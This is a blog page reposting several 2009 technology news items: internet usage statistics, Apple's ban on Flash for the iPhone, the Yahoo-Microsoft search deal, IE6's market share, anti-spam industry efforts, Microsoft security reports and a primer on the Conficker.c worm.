loosy|goosy|ness - Blog

Email

• 90 trillion – The number of emails sent on the Internet in 2009.
• 247 billion – Average number of email messages per day.
• 1.4 billion – The number of email users worldwide.
• 100 million – New email users since the year before.
• 81% – The percentage of emails that were spam.
• 92% – Peak spam levels late in the year.
• 24% – Increase in spam since last year.
• 200 billion – The number of spam emails per day (assuming 81% are spam).

Websites

• 234 million – The number of websites as of December 2009.
• 47 million – Added websites in 2009.

Web servers

• 13.9% – The growth of Apache websites in 2009.
• -22.1% – The growth of IIS websites in 2009.
• 35.0% – The growth of Google GFE websites in 2009.
• 384.4% – The growth of Nginx websites in 2009.
• -72.4% – The growth of Lighttpd websites in 2009.

Domain names

• 81.8 million – .COM domain names at the end of 2009.
• 12.3 million – .NET domain names at the end of 2009.
• 7.8 million – .ORG domain names at the end of 2009.
• 76.3 million – The number of country code top-level domains (e.g. .CN, .UK, .DE, etc.).
• 187 million – The number of domain names across all top-level domains (October 2009).
• 8% – The increase in domain names since the year before.

Internet users

• 1.73 billion – Internet users worldwide (September 2009).
• 18% – Increase in Internet users since the previous year.
• 738,257,230 – Internet users in Asia.
• 418,029,796 – Internet users in Europe.
• 252,908,000 – Internet users in North America.
• 179,031,479 – Internet users in Latin America / Caribbean.
• 67,371,700 – Internet users in Africa.
• 57,425,046 – Internet users in the Middle East.
• 20,970,490 – Internet users in Oceania / Australia.

Social media

• 126 million – The number of blogs on the Internet (as tracked by BlogPulse).
• 84% – Percent of social network sites with more women than men.
• 27.3 million – Number of tweets on Twitter per day (November, 2009)
• 57% – Percentage of Twitter’s user base located in the United States.
• 4.25 million – People following @aplusk (Ashton Kutcher, Twitter’s most followed user).
• 350 million – People on Facebook.
• 50% – Percentage of Facebook users that log in every day.
• 500,000 – The number of active Facebook applications.

Images

• 4 billion – Photos hosted by Flickr (October 2009).
• 2.5 billion – Photos uploaded each month to Facebook.
• 30 billion – At the current rate, the number of photos uploaded to Facebook per year.

Videos

• 1 billion – The total number of videos YouTube serves in one day.
• 12.2 billion – Videos viewed per month on YouTube in the US (November 2009).
• 924 million – Videos viewed per month on Hulu in the US (November 2009).
• 182 – The number of online videos the average Internet user watches in a month (USA).
• 82% – Percentage of Internet users that view videos online (USA).
• 39.4% – YouTube online video market share (USA).
• 81.9% – Percentage of embedded videos on blogs that are YouTube videos.

Web browsers

Malicious software

• 148,000 – New zombie computers created per day (used in botnets for sending spam, etc.)
• 2.6 million – Amount of malicious code threats at the start of 2009 (viruses, trojans, etc.)
• 921,143 – The number of new malicious code signatures added by Symantec in Q4 2009.

Data sources: Website and web server stats from Netcraft. Domain name stats from Verisign and Webhosting.info. Internet user stats from Internet World Stats. Web browser stats from Net Applications. Email stats from Radicati Group. Spam stats from McAfee. Malware stats from Symantec (and here) and McAfee. Online video stats from Comscore, Sysomos and YouTube. Photo stats from Flickr and Facebook. Social media stats from BlogPulse, Pingdom (here and here), Twittercounter, Facebook and GigaOm.

Don’t hold your breath waiting for the iPhone to support Adobe’s Flash software: Apple’s terms-of-service agreement prohibits it.

Although Adobe says it is working on a version of its popular Flash player for the iPhone, Apple is unlikely ever to permit it to appear in the handset’s App Store, no matter how much customers want it.

“I’m pretty skeptical that Flash could be implemented in a way that doesn’t violate the Terms of Service of the developer’s agreement,” said Bart Decrem, CEO of Tapulous, developer of the popular Tap Tap Revenge iPhone game.

Flash is Adobe’s highly popular platform for displaying interactive graphics, animations and multimedia within a browser. According to Adobe, 98 percent of desktop computers currently support Flash, which has led to its widespread use by web developers. Adobe’s recent announcement that it is working on a version of Flash for Windows Mobile has prompted speculation that an iPhone version might be coming soon. But the speculators may be waiting in vain, based on Apple’s TOS and the company’s history of tightly controlling applications for its smartphone platform.

Allowing Flash — which is a development platform of its own — would just be too dangerous for Apple, a company that enjoys exerting total dominance over its hardware and the software that runs on it. Flash has evolved from being a mere animation player into a multimedia platform capable of running applications of its own. That means Flash would open a new door for application developers to get their software onto the iPhone: Just code them in Flash and put them on a web page. In so doing, Flash would divert business from the App Store, as well as enable publishers to distribute music, videos and movies that could compete with the iTunes Store.

Apple’s well aware of these problems, which is why the company wrote a clause in its iPhone developers’ Terms of Service agreement (.pdf) that prohibits Flash from appearing on the iPhone:

“An Application may not itself install or launch other executable code by any means, including without limitation through the use of a plug-in architecture, calling other frameworks, other APIs or otherwise,” reads clause 3.3.2 of the iPhone SDK agreement, which was recently published on WikiLeaks. “No interpreted code may be downloaded and used in an Application except for code that is interpreted and run by Apple’s Published APIs and built-in interpreter(s).”

This could come as major disappointment to iPhone owners, as the lack of Flash support has been a paramount complaint about the handset since its release. No Flash means that the iPhone browser is incapable of displaying a large portion of the internet. For example, free Flash games aren’t supported, videos can’t be streamed from the vastly popular television and movie site Hulu, and websites that use Flash to render content or navigation won’t work on the iPhone.

It’s no wonder Adobe is expressing reluctance about the prospects of Flash for iPhone. The company on Monday demonstrated a version of Flash for Windows
Mobile handsets. And all that product manager Michele Turner could say about iPhone was, “We are working on Flash on the iPhone, but it is really up to Apple.”

Adam Dann, CEO of Nullriver, agrees that Flash would take away some of Apple’s control. Apple eventually banned Nullriver’s application NetShare because it violated AT&T Terms of Service agreement by turning the iPhone into a wireless modem for tethering. If Apple introduced Flash to iPhone, it’s possible Nullriver could code a Flash version of NetShare, repeating that violation, Dann said.

Dann added that the only way Flash could ever appear on the iPhone is if Adobe offered an extremely stripped-down version of the software. But even if there is a “Flash Lite” for iPhone, that just reinforces the point that the handset’s owners still will not have a true Flash experience.

And aside from taking software control away from Apple, Flash would introduce a slew of other potential headaches as well. Flash apps could hurt battery life, suck up the graphics-processing unit’s power, use an inordinate amount of memory, or potentially introduce security risks. Apple has plenty of customer complaints to address about the iPhone; the last thing it needs is to add Adobe and Flash to the pile.

In August, Britain’s Advertising Standards Authority pulled an iPhone advertisement because the commercial said, “All the parts of the internet are on the iPhone.” The lack of Flash and Java support on iPhone were enough for the ad to be deemed misleading. And it’s looking like Apple won’t be able to air that ad again.

Apple did not return phone calls for comment.

[via wired], [Download Apple iPhone SDK Agreement via wikileaks]

Microsoft announced a broad range of new functionality for Bing, its search engine, on Nov. 11. In addition to incorporating results from Wolfram Alpha, a "computational engine" that provides a definitive numerical answer to a search query, the revamped Bing offers a more robust video page—with feeds from MSN Video, Hulu, and ABC—and more intensive search in categories such as local events and cities.

In a sign of the increased importance of social networking to corporations such as Microsoft and Google, Bing has also incorporated Facebook and Twitter into its search features.

New study places Firefox at the top of vulnerability list for for the first half of 2009:

Application security vendor Cenzic today released its security trends report for the first half of 2009 application. In it, Cenzic claims that the Mozilla's Firefox browser led the field of Web browsers in terms of total vulnerabilities.

According to Cenzic, Firefox accounted for 44 percent of all browser vulnerabilities reported in the first half of 2009. In contrast, Apple's Safari had 35 percent of all reported browser vulnerability, Microsoft's Internet Explorer was third at 15 percent and Opera had just six percent share.

The 2009 figures stand in contrast to Cenzic's Q3/Q4 2008 report, where IE accounted for 43 percent of all reported Web browser vulnerabilities and Firefox followed closely at 39 percent.

As to why Firefox's numbers were so high, Cenzic has a few ideas.

"It's a combination of different things," Lars Ewe, CTO of Cenzic, told InternetNews.com. "They've gotten more traction as a browser, which is good for them and the more you get used the more exposure you have. As well a fair amount of the vulnerabilities have come by way of plug-ins."

One key area that Ewe said was responsible for a number of reported Firefox vulnerabilities is with how the browser handles plug-ins.

"The plug-in architecture that they have is a selling fact for the browser and one of the reasons why I love using it," Ewe said. "They can't control security aspects of all the plug-ins and the vulnerabilities are a side effect of that."

Mozilla has made numerous efforts this year to bolster its plug-in security. Recently they launched a plug-in checker service to ensure that users are running up-to-date versions. The Firefox 3.0.9 update, which came out in April, specifically addressed several key plug-in vulnerabilities.

Though Firefox had the highest number of vulnerabilities, that doesn't necessarily mean that Firefox users were more vulnerable.

Ewe said that Cenzic looked at all reported vulnerabilities. There is no specific differentiation for zero day bugs in the browser vulnerability count either. All that raises the question of how Cenzic actually came up with their vulnerability counts in the first place.

"The process that we follow is looking at a number of different vulnerability databases and sources that we have and trying to come up with a fair percentage based on the deviations we see between the databases," Ewe said. "You could make the argument, that's its 40 percent or 42 percent and there might be some variation on how you analyze it, but certainly it's not off by 20 percent."

While the Cenzic report shows Firefox at the top of the browser vulnerability pile, Ewe was quick to note that Cenzic uses Mozilla technology within its own solutions.

"Full disclosure here, Mozilla plays an important role in Cenzic's solution," Ewe said. "We are actually sitting on top of Mozilla as our agent of preference for scanning sites."

Cenzic develops an application scanning solution that uses the underlying Mozilla browser technology to test out security on Web site insides of a real browser context.

"We have a technology that we refer to as stateful assessment technology," Ewe said. "The idea behind it is to have as faithful an interaction with a Web site as possible and to determine vulnerabilities not on simple signatures but on behavioral basis of the application."

Ewe explained that when you do a cross-site scripting attack with a signature-based approach you'd just look for a server response that would indicate that the script tag has been injected. He added that the problem with that approach is that it's not faithful and the security researcher doesn't know if there is any additional logic on the client side that takes care of the script tag.

"If you want to be really faithful in the process you need to have full rendering capabilities and have all the JavaScript event handling," Ewe said. "So we leverage the entire Firefox architecture in order for us to actually have as faithful an interaction with a server as possible and maintain the client state. That results in low false-positives."

Source: www.internetnews.com

SUNNYVALE, CA and REDMOND, WA — 29 July, 2009 — Yahoo! and Microsoft announced an agreement that will improve the Web search experience for users and advertisers, and deliver sustained innovation to the industry. In simple terms, Microsoft will now power Yahoo! search while Yahoo! will become the exclusive worldwide relationship sales force for both companies' premium search advertisers.

For Web users and advertisers, this deal will accelerate the pace and breadth of innovation by combining both companies' complementary strengths and search platforms into a market competitor with the scale to fuel sustained development in search and search advertising. Users will find what they care about faster and with more personal relevance. Microsoft's competitive search platforms will lead to more value for advertisers, better results for web publishers, and increased innovation and efficiency across the Internet.

Under this agreement, Yahoo! will focus on its core business of providing consumers with great experiences with the world's favorite online destinations and Web products.

"This agreement comes with boatloads of value for Yahoo!, our users, and the industry. And I believe it establishes the foundation for a new era of Internet innovation and development," said Yahoo! CEO Carol Bartz. "Users will continue to experience search as a vital part of their Yahoo! experiences and will enjoy increased innovation thanks to the scale and resources this deal provides. Advertisers will also benefit from scale and enjoy greater ease of use and efficiencies working with a single platform and sales team for premium advertisers. Finally, this deal will help us increase our investments in priority areas in winning audience properties, display advertising capabilities, and mobile experiences."

Providing a viable alternative to advertisers, this deal will combine Yahoo! and Microsoft search marketplaces so that advertisers no longer have to rely on one company that dominates more than 70 percent of all search. With the addition of Yahoo!'s search volume, Microsoft will achieve the size and scale required to unleash competition and innovation in the market, for consumers as well as advertisers.

Microsoft CEO Steve Ballmer said the agreement will provide Microsoft's search engine, Bing, the scale necessary to more effectively compete, attracting more users and advertisers, which in turn will lead to more relevant ads and search results.

"Through this agreement with Yahoo!, we will create more innovation in search, better value for advertisers, and real consumer choice in a market currently dominated by a single company," said Ballmer. "Success in search requires both innovation and scale. With our new Bing search platform, we've created breakthrough innovation and features. This agreement with Yahoo! will provide the scale we need to deliver even more rapid advances in relevancy and usefulness. Microsoft and Yahoo! know there's so much more that search could be. This agreement gives us the scale and resources to create the future of search."

"This deal fits the long-term strategic direction of Yahoo! to remain the world's leading online media company and Carol Bartz has the full and unanimous support of the Yahoo! Board behind this deal," said Roy Bostock, chairman, Yahoo! Inc. "This is a significant opportunity for us. Microsoft is an industry innovator in search, and it is a great opportunity for us to focus our investments in other areas critical to our future."

The key terms of the agreement are as follows:

• The term of the agreement is 10 years;

• Microsoft will acquire an exclusive 10 year license to Yahoo!'s core search technologies, and Microsoft will have the ability to integrate Yahoo! search technologies into its existing web search platforms;

• Microsoft's Bing will be the exclusive algorithmic search and paid search platform for Yahoo! sites. Yahoo! will continue to use its technology and data in other areas of its business such as enhancing display advertising technology.

• Yahoo! will become the exclusive worldwide relationship sales force for both companies' premium search advertisers. Self-serve advertising for both companies will be fulfilled by Microsoft's AdCenter platform, and prices for all search ads will continue to be set by AdCenter's automated auction process.

• Each company will maintain its own separate display advertising business and sales force.

• Yahoo! will innovate and "own" the user experience on Yahoo! properties, including the user experience for search, even though it will be powered by Microsoft technology.

• Microsoft will compensate Yahoo! through a revenue sharing agreement on traffic generated on Yahoo!'s network of both owned and operated (O&O) and affiliate sites.

  • Microsoft will pay traffic acquisition costs (TAC) to Yahoo! at an initial rate of 88% of search revenue generated on Yahoo!'s O&O sites during the first 5 years of the agreement.

  • Yahoo! will continue to syndicate its existing search affiliate partnerships.

• Microsoft will guarantee Yahoo!'s O&O revenue per search (RPS) in each country for the first 18 months following initial implementation in that country.

• At full implementation (expected to occur within 24 months following regulatory approval), Yahoo! estimates, based on current levels of revenue and current operating expenses, that this agreement will provide a benefit to annual GAAP operating income of approximately $500 million and capital expenditure savings of approximately $200 million. Yahoo! also estimates that this agreement will provide a benefit to annual operating cash flow of approximately $275 million.

• The agreement protects consumer privacy by limiting the data shared between the companies to the minimum necessary to operate and improve the combined search platform, and restricts the use of search data shared between the companies. The agreement maintains the industry-leading privacy practices that each company follows today.

The agreement does not cover each company's web properties and products, email, instant messaging, display advertising, or any other aspect of the companies' businesses. In those areas, the companies will continue to compete vigorously.

The transaction will be subject to regulatory review. The agreement entered into today anticipates that the parties will enter into more detailed definitive agreements prior to closing. Microsoft and Yahoo! expect the agreement to be closely reviewed by the industry and government regulators, and welcome questions. The companies are hopeful that closing can occur in early 2010.

The companies have established a website at http://www.choicevalueinnovation.com to provide consumers, advertisers and publishers with additional information about the benefits of the agreement.

Conference Call – 5:30 a.m. PDT, Wednesday, July 29

Yahoo! and Microsoft will host a conference call with Yahoo! CEO Carol Bartz and Microsoft CEO Steve Ballmer to discuss the agreement at 5:30 a.m. Pacific/8:30 a.m. Eastern Time today. To listen to the call, please dial 1-866-515-2908 in the U.S. and Canada; +1-617-399-5122 international, reservation number: 47968026. A live webcast of the call can be accessed through Yahoo!’s Investor Relations website at http://yhoo.client.shareholder.com/results.cfm. The companies have also established a website at http://www.choicevalueinnovation.com to provide consumers, advertisers and publishers with additional information about the benefits of the agreement. In addition, an archive of the webcast will be available through the same link. An audio replay of the call will be available for two weeks following the conference call by calling 1-888-286-8010 in the U.S. and Canada; +1-617-801-6888 international, reservation number: 91217610.

Non-GAAP Financial Measures

This release refers to operating cash flow (operating income before depreciation, amortization of intangible assets, and stock-based compensation expense, or OCF), which is a non-GAAP financial measure. The most comparable GAAP measure is income from operations. The estimated annual OCF benefit of $275 million included in this press release is the estimated annual benefit in income from operations of $500 million less approximately $225 million of estimated annual savings in depreciation, amortization and stock-based compensation expense.

Source: http://www.choicevalueinnovation.com

Today's browser wars are nothing like the early browser wars of the mid '90s, but there are still plenty of casualties and lots of underlying uncertainty. However, there may be a bright spot on the horizon.

Current Browser Rankings

Based upon relatively recent data from Net Applications, there are really only four main browsers in the game today: Internet Explorer (IE) with roughly 66% of the market, Firefox with 22% of the market, Safari at 8% control, and Chrome with almost 2% of the market. Opera and all other browsers combined come in at only 2% of the market, even though the way that many of these browsers emulate other, better-known, user-agent strings to identify themselves might mean that they actually control a bit more of the market than is immediately obvious. But, even so, that really only leaves IE, FireFox, and Safari as the primary combatants.

Things get interesting though when you break down usage among versions of IE, especially if you start comparing those percentages against other browsers. At this point, no single browser is able to claim a true majority of Internet users. In fact, it becomes a rough-and-tumble race for supremacy. For example, IE 7 is the current, dominant, flavor of Internet Explorer - with roughly 27% market share. That puts it in roughly the same league as Firefox. Whereas IE 8, which seems to be seeing some decent yet rather slow adoption (among IE 7 users) comes in at 12%, roughly in the same league as Safari.

That leaves that ponderously old and terribly despised (by web developers at least) beast known as IE 6 still commanding roughly 20% of overall market share.

Internet Explorer 6 is Old, Beastly, and Holds the Future of the Web

IE 6 was released in August of 2001—it's now been around a little under 8 years, which is an eternity in Internet time. Yet it's still going strong with roughly 20% of the overall browser market. Of course, what's unknown is how many of those still on IE 6 are using it explicitly to maintain backward compatibility with their own internal web applications, or how many of them are either lazy users who can't be bothered to upgrade, or simply don't care about upgrading. Even though Microsoft clearly has upgrade paths for these users many haven't taken advantage of those paths (IE 7 and now IE 8) over the years.

I think it’s ironic that IE 6 users hold the key to the future of the web, at least in terms of which browsers will gain dominance. The 20% of users running IE6 today represent veterans of a browser war that was fought (and won by Microsoft) nearly a decade ago. And what these users choose as their next browser could have a big impact on which browser emerges victorious in the current skirmish we're seeing among IE, Firefox, Safari, and even Chrome.

On the one hand, if the majority of IE 6 users are just lazy or don't know how to upgrade, it's relatively safe to assume that they'll just upgrade to IE 8 as they become aware of easy upgrade options (or get new machines, though some could convert to Safari in this process). On the other hand, if the majority of these users explicitly need IE 6 to make corporate sites work correctly, then it's conceivable that many will like stay on current hardware, use IE 6 for their apps, and install Firefox or Chrome along with IE6 for any of the more modern browsing needs they may have. Either way, there's a large segment of users out there who can have a big impact on where things head in the future. As more and more pressure mounts on those users to switch or upgrade it will be interesting to see what happens, especially considering some of the recent turbulence in this arena (that has apparently been so big that it's caused Net Application Data to review their most recent numbers for a few days now).

Ditching IE 6

It's no secret, of course, that IE6 has long been viewed quite critically by web developers. In fact, it's probably safe to say that most web developers despise it. A key reason for that less than amicable sentiment is the amount of tweaking and hacking it takes to get new sites and content to work in IE 6. Or, as more than one sarcastic comment on http://www.saveie6.com/ points out, with IE6 out of the mix web developers and designers might end up going bankrupt as they'd lose half of all of their billable hours trying translate their sites and designs to render correctly on IE 6.

As a developer who has spent way too much time battling CSS hacks and other problems with sites for rendering in IE 6, I'd only be too happy if IE 6 would go away tomorrow. Sadly, it looks like that won't be the case, and I've checked browser statistics on a couple of the sites I work with over the past few months to see how soon I could begin possibly ignoring IE6 traffic. But sadly, on most of the sites I work with or maintain, IE 6 still represents 10-20% of the traffic, which is truly heartbreaking for me.

I relished a decision by YouTube to discontinue support for IE 6 relatively shortly. Even better, this news comes on the heels of other reports pointing out that other sites will be dropping support for IE6 as well.

Of course, as much as I could hope that this would trigger a cascade of other sites deciding to similarly pull support (making it easier for me to do the same), it's probably worth remembering that if the majority of IE 6 users are truly using IE 6 to explicitly maintain compatibility with their own intranet or business applications, then the content on YouTube or Digg likely isn't going to be a huge loss to these users. But we can always hope.

The Future of IE 6

What does all of this mean for web developers? Not a lot at this exact moment. Someday we might hit that bright-spot where we no longer need to waste time making sites work in IE 6. If enough sites take a cue from YouTube and Digg (and hopefully a few will) that might drive some momentum for change. That, in turn, could propel some IE 6 users to jump ship, changing the balance even more dramatically. When that happens, we'll be that much closer to cutting out a huge amount of effort when it comes to web development in general.

Source: http://www.devproconnections.com

The people who run the world's internet systems are a rather secretive bunch.  Three times a year, senior technical officers from companies such as Google, Yahoo, AT&T, Comcast and Verizon meet to discuss ways of stopping the internet from being swamped by rising levels of spam, viruses and hacking attacks by organised criminals. They do not generally like discussing these meetings.  "Some people might get nervous if they knew all the things we talked about," said Michael O'Rierdan, chairman of the Messaging Anti-Abuse Working Group (MAAWG). "It’s our job to make the internet safe, but we don't want to put people off using the web."  They are also worried about being targeted by the cyber-criminals they are trying to thwart.

Most of the spam and hacking on the internet is run by organised crime rings. There is an underground economy that hacks into computers, sells stolen identities and orchestrates the sending of spam e-mails about everything from fake Viagra pills to banking scams. There is a lot of money at stake in keeping these operations running.  “We get threats every day," said Larry, chief technical officer of Spamhaus, a non-profit organisation that exposes spammers. He prefers not to reveal his surname. "In the US it is people bringing lawsuits against us. And then there are organised criminals in Russia and Ukraine, who use different methods."  Steve Linford, the organisation's founder, has been advised by police not to open unexpected packages arriving at his home.

MAAWG meetings are also places to discuss some of the controversial measures that internet companies need to take in the fight against spam, such as blocking some types of e-mail traffic. This measure sits awkwardly with civil liberties bodies.  The 270 delegates from 19 countries who met at Amsterdam's venerable Hotel Krasnapolsky last week were far from the usual, suit-wearing conference crowd. An eclectic mix of tattoos, ponytails, high-waisted trousers and backpacks indicated that these were true operations people who work in the bowels of the network.  Membership is strictly vetted and journalists are not normally invited to attend, but MAAWG has started to lift its veil a little. There is a growing feeling that the industry must reach out to consumers and get them to help fight cyber-crime.

In 2008, 349.6bn spam messages were sent across the internet, according to Symantec, the internet security company. Spam accounts for an average of almost 94 per cent of all e-mail messages.  Nearly 90 per cent of spam is sent from computers that have been hacked into and are being remotely programmed to send out spam.  More than 9.4m computers have been hijacked in this way and their owners are usually entirely unaware it is going on. It will be impossible to clean up these machines without talking to consumers.

"Sometimes we want people to know what we are doing, so they can yell at the politicians to give us more help," said Jerry Upton, executive director of MAAWG.  There is a rising sense of crisis among internet companies about the cost of spam. Few are willing to quantify how much they have to spend to fight spam, but Mr O'Rierdan estimated that big internet service providers employ five to 10 staff just to look at spam. In addition they must buy spare servers, routers and other equipment to cope with the volumes of junk mail, buy spam-filtering software and run support centers for their customers.

Viriya Upatising, chief technical officer of True Internet, a Thai internet service provider, said junk mail was a crippling cost for the company because it was paying to send the unwanted data across undersea cable connections to destinations such as the US and Europe.  "The cost of bandwidth is expensive in Asia," Mr Upatising said. "It costs us $250 per megabit per month to send data internationally."  The company put in place a draconian system that prevents suspected spammers from using its network. The measures have cut unwanted messages from 3.5m a day to a more manageable 250,000.

"We are all sharing these costs," said Patrick Peterson, chief technology officer at Ironport Systems, Cisco's e-mail security arm. "Spam is a stealth tax on consumers. ISPs have to pay for the spam, for the extra bandwidth, for equipment, and they are forced to put up their prices for consumers."

There is a fear among internet security professionals that they might be losing the battle to cyber-criminals. This may also be why they now want the public to know more about what they do, to show they have at least tried.  "I don't know if we can control it," said Dave Crocker, one of the early pioneers of e-mail and now a senior technical adviser to MAAWG.  He added: "It is an arms race. We are getting better at filtering out rogue messages but every day the criminals get better too, and they are better organized and more aggressive."

Keywords: the dark side of the web

* Spam: Unsolicited electronic messages, most commonly e-mail, but also increasingly common in instant messaging, blogs and mobile phone messages. The first e-mail spam is believed to have been sent in 1978.

* Malware: Malicious software designed to infiltrate or damage a computer system without the owners' consent. Symantec, the internet security company, has estimated there is now more malware released each year than legitimate software programs. There are many different types of malware, including viruses, worms and Trojan horses.

* Phishing : The fraudulent attempt to acquire sensitive information such as passwords, bank account details and credit card numbers. Typically it is in the form of an e-mail that directs people to a fake website - that looks like the legitimate site of a bank or other trusted organisation - where people are asked to enter personal details.

* Botnets: A network of computers that have been hacked and are being remotely controlled by cyber-criminals. Typically they are used to send out spam messages or viruses in large numbers. Most users will be unaware if their computer has been infiltrated and added to a botnet. Symantec estimated there were more than 9.4m machines hijacked in this way in 2008.

Source: http://www.ft.com

Microsoft will begin offering its first hosted security service under the Forefront brand on Thursday, dubbed Forefront Online Security for Exchange and designed to help keep malware and spam out of e-mail in-boxes.

The hosted service, which will cost $20 per user per year or less based on volume licensing, targets enterprise Exchange customers and includes a Web-based console for setting up policies for virus and spam protection, said Doug Leland, general manager of Microsoft's Identity and Security Business Group.

The releases will follow the timeline of Exchange 2010, which entered public beta this week. More hosted security services will be coming but Leland declined to elaborate.

Microsoft also will finally release on Thursday a new, public beta version of its Stirling security suite, which is the next generation of the Forefront software.

The initial beta version of Stirling was released a year ago and was supposed to be refreshed by the end of 2008. It will include client, server, and application security technology and offer a single management console.

Stirling components will come in staggered releases starting later this year with Forefront Security for Exchange and Threat Management and continuing through the first half of 2010, Leland said. The company also is changing the name of its Identity Lifecycle Manager product to Forefront Identity Manager and plans to offer a new set of technologies, code-named Geneva, for helping corporations improve the security of software and services, Microsoft said.

In addition, Microsoft said it is investing $75 million in a partner ecosystem, including making a strategic partnership with RSA. Other companies integrating with Stirling include Kaspersky, Brocade, Juniper Networks, Guardium, Imperva, Sourcefire, StillSecure, Q1 Labs, and Tipping Point.

The moves are part of the company's strategy to provide "Business Ready Security."

The moves are part of Microsoft's effort to broaden the scope of its security offerings to incorporate data protection, access and management, all built around the concept of identity, Leland said.

Microsoft wants to offer the ability for corporations to set "fine-grained security policies and have a deeper understanding about who in the organization is triyng to access data and what they are trying to do with it," he said.

Source: http://news.cnet.com

[Update]: Forefront Online Security for Exchange is not only limited to Exchange Server, it can be used by all other mail server.

More than 97% of all e-mails sent over the net are unwanted, according to a Microsoft security report.

The e-mails are dominated by spam adverts for drugs, and general product pitches and often have malicious attachments.

The report found that the global ratio of infected machines was 8.6 for every 1,000 uninfected machines.

It also found that Office document attachments and PDF files were increasingly being targeted by hackers.

Microsoft said people should not panic about the high levels of unwanted e-mail.

Cliff Evans, head of security and privacy for Microsoft in the UK, told BBC News: "The good news is that the majority of that never hits your inbox although some will get through."

Ed Gibson, chief cyber security advisor at Microsoft, said the rise in spam was due to traditional organised crime figures moving away from exploiting software vulnerabilities and "targeting the weak link that is you and me".

"With higher capacity broadband and better OS (operating systems), and higher power computers it is easier now to send out billions of spams. Three or four years ago the capacity wasn't there."

Malware ecosystem

Paul Woods, senior analyst at e-mail security firm Message Labs, said he was surprised the Microsoft figure for unwanted e-mail was so high.

"Our own analysis shows that around 81% of e-mail traffic we were processing was identified as spam and unwanted," he said.

MessageLabs said spam rates had fallen at the end of 2008 as an ISP which had been hijacked to send out spam mails to users had been taken offline.

"As a result of that, a number of developers in botnet technology at the end of last year were trying to regain botnet control and increase capacity and return to previous spam levels.

"It wont be far off before we see return to those levels."

The report, which looked at online activity during the second half of 2008, also pinpoints the countries that are suffering from the most infections of malicious software, or malware.

Russia and Brazil top the global chart of infections, followed by Turkey and Serbia and Montenegro.

It said that the type of malware varied from country to country.

"As the malware ecosystem becomes more reliant on social engineering, threats worldwide have become more dependent on language and cultural factors," it reported.

In China, several malicious web browser modifiers are common, while in Brazil, malware that targets users of online banks is more widespread.

In Korea, viruses such as Win32/Virut and Win32/Parite are common.

 

Global average

The global average for infected machines is 8.6 for every 1,000 uninfected PCs.

The UK's infection rate is 5.7, according to the Microsoft report.

The report highlighted the need to keep operating systems, web browsers and applications up to date with the latest versions.

Increasingly, hackers are using common file formats, such as Microsoft Office documents and Adobe's PDF format as the carrier of malicious exploits or programs.

More than 91% of attacks exploiting vulnerabilities in Microsoft Office were using security holes that had been plugged by updates that had been available for more than two years.

Attacks using PDF files rose sharply in the second half of 2008, the report noted.

The vulnerabilities all of the attacks exploited had already been fixed by Adobe, and were not present in the most recent versions of the software.

Mr Gibson told BBC News people had to be aware that if they did not update their applications, such as Office and Adobe, they were not just putting themselves at risk, but others on the internet also.

"If you don't update your software you are not just a hazard to yourself, you are hazard to others because you can be part of a botnet [if your computer is hijacked]."

Mr Evans said Microsoft was very happy with the approach consumers were taking to updating applications via automatic updates.

"For consumers it is happening but for business less so. We have encourage businesses to make more use of automatic updates."

 

Scareware

Mr Woods said malicious hackers were exploiting Office document attachments and PDF files in order to make more targeted attacks.

"They tend to be used in selective attacks to named individuals in organisations.

"A lot of social engineering will be used to appear legitimate and convince a user to open the attachment

"Once opened, a vulnerability in the application used to open the document will be exploited and often a tiny piece of code will execute and then download a larger file from a rogue website.

"This program will then attempt to search the computer for a particular document or file and sent it to a remote PC."

The report also highlighted the rise in the use of so-called scareware, fake security programs which falsely tell people they need to install software which does nothing other than attempt to steal personal details from a users' PC.

"It's criminals playing on people's fears," said Mr Evans.

"The advice remains the same - ensuring you have up to date software, whether that's your applications, your browser or your OS."

 

Source: http://news.bbc.co.uk

Remember the dire predictions surrounding the "millennium bug?" The doom-and-gloom scenarios bandied about by security analysts on how computers could act when their clocks turned to January 1, 2000?

Well, researchers are hoping that a potential April Fools' time bomb -- the Conficker.c that is supposed to hit computers on April 1 -- turns out to be equally unfounded.

But realizing that hope alone is not a prudent option, here is a primer on the worm so you can adequately prepare yourself -- and your computer.

Computer users will not know that Conficker.c has infected their machine.

What is Conficker.c and what do analysts fear it may do?

Conficker.c is a worm, a malicious program thought to have already infected between 5 million and 10 million computers.

Those infections haven't spawned many symptoms, but on April 1 a master computer is scheduled to gain control of these zombie machines, said Don DeBolt, director of threat research for CA, a New York-based IT and software company.

What happens on April Fools' Day is anyone's guess.

The program could delete all of the files on a person's computer, use zombie PCs -- those controlled by a master -- to overwhelm and shut down Web sites or monitor a person's keyboard strokes to collect private information like passwords or bank account information, experts said.

More likely, though, said DeBolt, the virus may try to get computer users to buy fake software or spend money on other phony products.

Experts said computer hackers largely have moved away from showboating and causing random trouble. They now usually try to make money off their viral programs

How does the Conficker.c work?

Conficker.c imbeds itself deep in the computer where it is difficult to track. The program, for instance, stops Windows from conducting automatic updates that could prevent it from causing damage.

The program's code is also written to evolve over time and its author appears to be making updates to thwart attempts to neuter the worm.

Who wrote the program?

It's unclear who wrote the program, but anti-work researchers -- a group calling itself the Conficker Cabal -- are looking for clues.

First, they know that some recent programs have come from Eastern European countries outside the jurisdiction of the European Union, said Patrick Morganelli, senior vice president of technology for Enigma Software.

Worm program authors often hide in those countries to stay out of sight from law enforcement, he said.

In a way, the Conficker Cabal is also looking for the program author's fingerprints. DeBolt said security researchers are looking through old programs to see if their programming styles are similar to that of Conficker C.

The prospects for catching the program's author are not good, Morganelli said. "Unless they open their mouth, they'll never be found," he said.

So, the most effective counter-assault simply may be damage control.

How can I tell if my computer's infected?

One quick way to see if your computer has been infected is to see if you have gotten automatic updates from Windows in March. If so, your computer likely is fine, DeBolt said.

Microsoft released a statement saying the company "is actively working with the industry to mitigate the spread of the worm."

Users who haven't gotten the latest Windows updates should go to http://safety.live.com if they fear they're infected, the company's statement says.

People who use other antivirus software should check to make sure they've received the latest updates, which also could have been disabled by Conficker.c.

How did the worm evolve?

The first version of Conficker -- strain A -- was released in late 2008. That version used 250 Web addresses -- generated daily by the system -- as the means of communication between the master computer and its zombies.

The end goal of the first line was to sell computer users fake antivirus software, said Morganelli.

Computer security experts largely patched that problem by working with the Internet Corporation for Assigned Names and Numbers to disable or buy the problematic URLs, he said.

A second variant, Conficker.b, was released in January and infected millions more machines.

The Conficker, strain C, will generate 50,000 URLs per day instead of just 250 when it becomes active, DeBolt said.

What is being done to fight Conficker?

Members are searching for the malicious software program's author and for ways to do damage control if he or she can't be stopped.

They're motivated in part by a $250,000 bounty from Microsoft.

Source: http://www.cnn.com

